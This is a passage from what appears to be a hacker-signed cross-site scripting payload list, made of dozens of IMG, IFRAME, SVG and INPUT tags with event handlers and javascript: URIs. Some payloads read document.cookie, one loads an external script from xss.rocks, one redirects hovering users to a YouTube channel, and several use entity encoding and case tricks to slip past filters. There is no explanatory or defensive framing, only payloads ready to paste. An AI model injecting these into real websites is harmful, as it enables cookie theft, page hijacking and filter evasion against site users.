onkeyup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondblclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onmousedown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onmousemove="alert(String.fromCharCode(88,83,83))"> <IMG
SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onmouseover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onmouseup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onmousewheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onwheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondrag="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondragend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondragenter="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondragleave="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondragover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondragstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondrop="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onscroll="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
oncopy="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
oncut="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onpaste="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onabort="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
oncanplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
oncanplaythrough="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
oncuechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ondurationchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onemptied="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onended="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onerror="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onloadeddata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onloadedmetadata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onloadstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onpause="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onplaying="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onprogress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onratechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onseeked="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onseeking="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onstalled="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onsuspend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ontimeupdate="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onvolumechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onwaiting="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onshow="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ontoggle="alert(String.fromCharCode(88,83,83))"> <META
onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; <IMG SRC=x
onload="alert(String.fromCharCode(88,83,83))"> <INPUT TYPE="BUTTON"
action="alert('XSS')"/> "><h1><IFRAME
SRC="javascript:alert('XSS');"></IFRAME>">123</h1> "><h1><IFRAME SRC=#
onmouseover="alert(document.cookie)"></IFRAME>123</h1> <IFRAME
SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=#
onmouseover="alert(document.cookie)"></IFRAME> "><h1><IFRAME SRC=#
onmouseover="alert(document.cookie)"></IFRAME>123</h1>
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe
frameborder="0%EF%BB%BF "><h1><IFRAME width="420" height="315"
SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0"
onmouseover="alert(document.cookie)"></IFRAME>123</h1> "><h1><iframe width="420"
height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0"
allowfullscreen></iframe>123</h1> ><h1><IFRAME width="420" height="315"
frameborder="0"
onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZrg'"></IFRAME>Hover
the cursor to the LEFT of this
Message</h1>&ParamHeight=250 <IFRAME width="420" height="315" frameborder="0"
onload="alert(document.cookie)"></IFRAME> "><h1><IFRAME
SRC="javascript:alert('XSS');"></IFRAME>">123</h1> "><h1><IFRAME SRC=#
onmouseover="alert(document.cookie)"></IFRAME>123</h1> <iframe
src=http://xss.rocks/scriptlet.html < <IFRAME
SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=#
onmouseover="alert(document.cookie)"></IFRAME> <iframe
src="&Tab;javascript:prompt(1)&Tab;"> <svg><style>{font-
family&colon;'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" <sVg><scRipt
>alert&lpar;1&rpar; {Opera} <img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript&colon;confirm(1)" <img src=``&NewLine;
onerror=alert(1)&NewLine

By @SHADOW2639 xD

-------------------------@XploitWizer ---------------------------
